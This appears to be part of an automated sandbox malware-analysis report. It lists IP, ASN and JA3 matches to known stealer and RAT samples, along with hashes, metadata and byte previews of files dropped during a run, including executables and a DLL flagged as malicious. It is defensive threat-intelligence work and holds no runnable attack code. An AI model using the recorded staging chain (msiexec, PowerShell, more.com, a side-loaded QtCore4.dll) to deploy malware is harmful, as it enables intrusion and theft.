                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          rentry.coowuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                          • 172.67.75.40
                                                                                          gkzHdqfg.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.75.40
                                                                                          xaSPJNbl.ps1Get hashmaliciousLummaCBrowse
                                                                                          • 172.67.75.40
                                                                                          Exploit Detector.batGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.75.40
                                                                                          MilwaukeeRivers.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.75.40
                                                                                          http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                                                          • 104.26.2.16
                                                                                          RobCheat.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                          • 172.67.75.40
                                                                                          Spedizione.vbsGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.75.40
                                                                                          sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.75.40

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.88.250
                                                                                          https://google.lt/amp/taerendil.online.fr/gpfv9cqYcuejGaVElbEvNcI6wCkeoGet hashmaliciousUnknownBrowse
                                                                                          • 104.16.40.28
                                                                                          file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 172.64.41.3
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.155.47
                                                                                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 172.67.177.134
                                                                                          DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 172.67.74.152
                                                                                          IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                          • 172.67.186.192
                                                                                          VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.67.152
                                                                                          order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.67.152
                                                                                          http://google.comGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.136.186
                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.88.250
                                                                                          https://google.lt/amp/taerendil.online.fr/gpfv9cqYcuejGaVElbEvNcI6wCkeoGet hashmaliciousUnknownBrowse
                                                                                          • 104.16.40.28
                                                                                          file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 172.64.41.3
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.155.47
                                                                                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 172.67.177.134
                                                                                          DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 172.67.74.152
                                                                                          IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                          • 172.67.186.192
                                                                                          VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.67.152
                                                                                          order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.67.152
                                                                                          http://google.comGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.136.186

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          t90RvrDNvz.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          docx008.docx.docGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          docx002.docx.docGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          docx009.docx.docGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          docx007.docx.docGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):26604
                                                                                          Entropy (8bit):5.053883819182895
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:SLbV3IpNBQkj2Uh4iUxkOZhxCardFvJ+OdBOtAHkvNZzNKe1MlYoaYP:SLbV3CNBQkj2Uh4iUxkOgqdJJ+OdBOtW
                                                                                          MD5:9F5869709E8C10EC941464657FF26A26
                                                                                          SHA1:85B55A98AE8580126A59765159A82601385D62C1
                                                                                          SHA-256:BE6F41D8AEEAF9183CB61B633B3F46A7B7DBDC2954F40C7A75B5CD5800E0F0C3
                                                                                          SHA-512:C7884E74269AF609DB901DD2E7639CB4022AAB434C3B387FF3DC952C1689BBD70F675DEAA49B48A6725716D144C325F0A996B9B1DDB4D1FD83BA70CBEA0E4BD5
                                                                                          Malicious:false
                                                                                          Preview:PSMODULECACHE.(...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.7307872139132228
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllul:NllU
                                                                                          MD5:6DA15BE18F0DF00B9DC2DC6B72B103F2
                                                                                          SHA1:4ADB8B407D51A20952CB8E4EC0349D742862B568
                                                                                          SHA-256:19704E2940D1D9E46CF80F36AAB157098B0A8C61865C087167F9AFA9A9F70352
                                                                                          SHA-512:5BF5FF5A02FA55C13D6DD266361F8DD2747DD657ABF21032E7DD3E9C28D65A3E9CB88F5AE7E6F2029E9FC37D5EA90C020F6423092C84DE41A2AD7E0DCBC72EB4
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................

                                                                                          C:\Users\user\AppData\Local\Temp\851378ef

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1045367
                                                                                          Entropy (8bit):7.572445590244692
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:/2kc2aVBUtix/kH511EEYWNppxq3NnASaNIW:/2B2OuYx8XBYWohAP
                                                                                          MD5:397BC51806ABD0FA996E0403133CD98C
                                                                                          SHA1:2DCDC2B97CA3F2B45E93416BA80FB386ED3C9E1A
                                                                                          SHA-256:66FF2B7979FFA4DEF09A15280B74EDF1D5272E55D4894B5900B5E9D54334215E
                                                                                          SHA-512:F103DD67FE2CF0259056B9684FB457C292D76E13E2473E461482CEFE8372B8618C1E05BBD2B080DF3965A09CC1CE51C8130D2A24AD3F36A77DD35ECCDF635E15
                                                                                          Malicious:false
                                                                                          Preview:.jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jp..+(..+,..65......................J5...$..................jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx...1...........x..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx...;..............jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..=1..#*.'........V..>$..........jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..XV.._H..]x..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx.

                                                                                          C:\Users\user\AppData\Local\Temp\8a6ce17d

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1045367
                                                                                          Entropy (8bit):7.572442714185415
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:z2kc2aVBUtix/kH511EEYWNppxq3NnASaNIW:z2B2OuYx8XBYWohAP
                                                                                          MD5:A81F98399CB1432064BE3CBE374E248F
                                                                                          SHA1:C5023639F225C81B0B04384D856860CA301BB70B
                                                                                          SHA-256:CB6DA873FA677401F9B30E79E2907CC164143E5ADB4B6333538DCAA6E3EB8DA5
                                                                                          SHA-512:595498722B813970DEAA4D8DD86C9909D953AA0482A6A02CFAEEFD0C3546C794AB9BE77F7D42C5A32A7703231B322D94C22B02CA23C3C704CAC62E667D8CA5E0
                                                                                          Malicious:false
                                                                                          Preview:.jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jp..+(..+,..65......................J5...$..................jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx...1...........x..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx...;..............jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..=1..#*.'........V..>$..........jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx..XV.._H..]x..jx..jx..jx..jx..jx..jx..jx..jx..jx..jx.

                                                                                          C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                          File Type:HTML document, ASCII text, with very long lines (8771), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8771
                                                                                          Entropy (8bit):6.1675656006183335
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:PN2x2BEiNI4IEmJHpaZYRUhfNpGZKwSDxKyFN:AxKNmHW3hfXGZuDxfN
                                                                                          MD5:8DDAAF95412592AB5356AE96E52827B7
                                                                                          SHA1:9A7B693544143B58A06C44F60BB8FA682711E9BA
                                                                                          SHA-256:FE61424D18E770B7FD8EFAC99F19E72D4C8D8BE0F08B5A9E69B5B9B2C8A45927
                                                                                          SHA-512:FDCB450BEE0C53DC6A96A8008E28F02F4D6824E0E213B0910B0C96E85F003345697798B001BF23C668B37FCDE8744CDC72016AB683690033ED18BAE46D654CA4
                                                                                          Malicious:true
                                                                                          Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3abcocvk.peh.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4t4grtu.yw2.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eov2mbnc.rqw.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2ekcfd5.k0k.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1elbk32.fty.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tltwzlfm.vxx.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\wpkoqtsrt

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\more.com
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):311808
                                                                                          Entropy (8bit):6.838546349295719
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:t5g9PjKfx5xWc/SW7wP+wkdGdfJ7rLRjqPz6LLi:tG9PjOxWca1OYfJjomC
                                                                                          MD5:02522A466B7EB24788120FE94D0EA99A
                                                                                          SHA1:A1A4E6490099437B88FCAA8D9367F3C9009A4644
                                                                                          SHA-256:C940F003D68479BC791145974A859697A8CD5F2E5D71A08D6FAE8B1188FF12EA
                                                                                          SHA-512:136BD178A5F714EA1212639AAFA1F91F0FB96933F9B4406C6A10E8966C55A90BDD6F88E8D26BEFE9C39E1BCA69854C360058B2C88A763E39B4AF6B65115D0FB9
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 62%
                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....!Z..........................................@.......................................@..................................+...............................P...<...................................................-...............................text............................... ..`.rdata... ......."..................@..@.data...`....@...X..................@....CRT.........@.......r..............@..@.reloc...<...P...>...t..............@..Basi.................................@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\yhg

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\more.com
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):311808
                                                                                          Entropy (8bit):6.838546349295719
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:t5g9PjKfx5xWc/SW7wP+wkdGdfJ7rLRjqPz6LLi:tG9PjOxWca1OYfJjomC
                                                                                          MD5:02522A466B7EB24788120FE94D0EA99A
                                                                                          SHA1:A1A4E6490099437B88FCAA8D9367F3C9009A4644
                                                                                          SHA-256:C940F003D68479BC791145974A859697A8CD5F2E5D71A08D6FAE8B1188FF12EA
                                                                                          SHA-512:136BD178A5F714EA1212639AAFA1F91F0FB96933F9B4406C6A10E8966C55A90BDD6F88E8D26BEFE9C39E1BCA69854C360058B2C88A763E39B4AF6B65115D0FB9
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 62%
                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....!Z..........................................@.......................................@..................................+...............................P...<...................................................-...............................text............................... ..`.rdata... ......."..................@..@.data...`....@...X..................@....CRT.........@.......r..............@..@.reloc...<...P...>...t..............@..Basi.................................@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6221
                                                                                          Entropy (8bit):3.73823279812991
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:Nrkem33CxHPfhkvhkvCCtWmzb6ym7Hxmzb6yk7HD:NoHyvf9WmPUtmPW3
                                                                                          MD5:B0F2DCCC286A4C73FFA5E6DE4C7C8F02
                                                                                          SHA1:0B924DDF92572B71542AC41E3ECE6B73ED489F98
                                                                                          SHA-256:4D5C32411F65CFD8289341ABFDEF0C79B7EE2A94B85966FDF55C9193B2504703
                                                                                          SHA-512:0872EEDFC43D9E59DAA4874AEB87A59928E12EC4F915C4A583A0E9CAF715FC46874C6232A58F28C0745D0AD5F3730BF1A3EB3046FBF3C4EC2907F2A24B231A94
                                                                                          Malicious:false
                                                                                          Preview:...................................FL..................F.".. ...-/.v.....*...?..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....jq...?...y...?......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^yY.N...........................%..A.p.p.D.a.t.a...B.V.1.....yY.N..Roaming.@......CW.^yY.N..........................<.o.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^yY.N..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................[.i.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^yY.N....Q...........

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P257X2FN4PMK28TO9VDX.temp

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6221
                                                                                          Entropy (8bit):3.73823279812991
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:Nrkem33CxHPfhkvhkvCCtWmzb6ym7Hxmzb6yk7HD:NoHyvf9WmPUtmPW3
                                                                                          MD5:B0F2DCCC286A4C73FFA5E6DE4C7C8F02
                                                                                          SHA1:0B924DDF92572B71542AC41E3ECE6B73ED489F98
                                                                                          SHA-256:4D5C32411F65CFD8289341ABFDEF0C79B7EE2A94B85966FDF55C9193B2504703
                                                                                          SHA-512:0872EEDFC43D9E59DAA4874AEB87A59928E12EC4F915C4A583A0E9CAF715FC46874C6232A58F28C0745D0AD5F3730BF1A3EB3046FBF3C4EC2907F2A24B231A94
                                                                                          Malicious:false
                                                                                          Preview:...................................FL..................F.".. ...-/.v.....*...?..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....jq...?...y...?......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^yY.N...........................%..A.p.p.D.a.t.a...B.V.1.....yY.N..Roaming.@......CW.^yY.N..........................<.o.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^yY.N..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................[.i.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^yY.N....Q...........

                                                                                          C:\Users\user\AppData\Roaming\UPEC\QtCore4.dll

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2598912
                                                                                          Entropy (8bit):6.604555317326718
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:5TFgiFpGXOENKRgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07M:5+iDaljxJsv6tWKFdu9CZgfn
                                                                                          MD5:17D26D22913C19D7A93F7F6AF7EC5D95
                                                                                          SHA1:0BBC1E108AF53990E4B9F2C34CBF7EFBE442BC92
                                                                                          SHA-256:E18684E62B3C076B91A776B71539A8B7640932055AE0831B73AD5FEE7C5DD4E7
                                                                                          SHA-512:FB2A4288BE915D7E62E6DCD1A4425A77C5DA69CC58DAA7F175B921FD017CDDB07F0D76C9016EB40475DEAD5DC7984B32B988AD6F5C5D14813B5A9E2867EB629A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
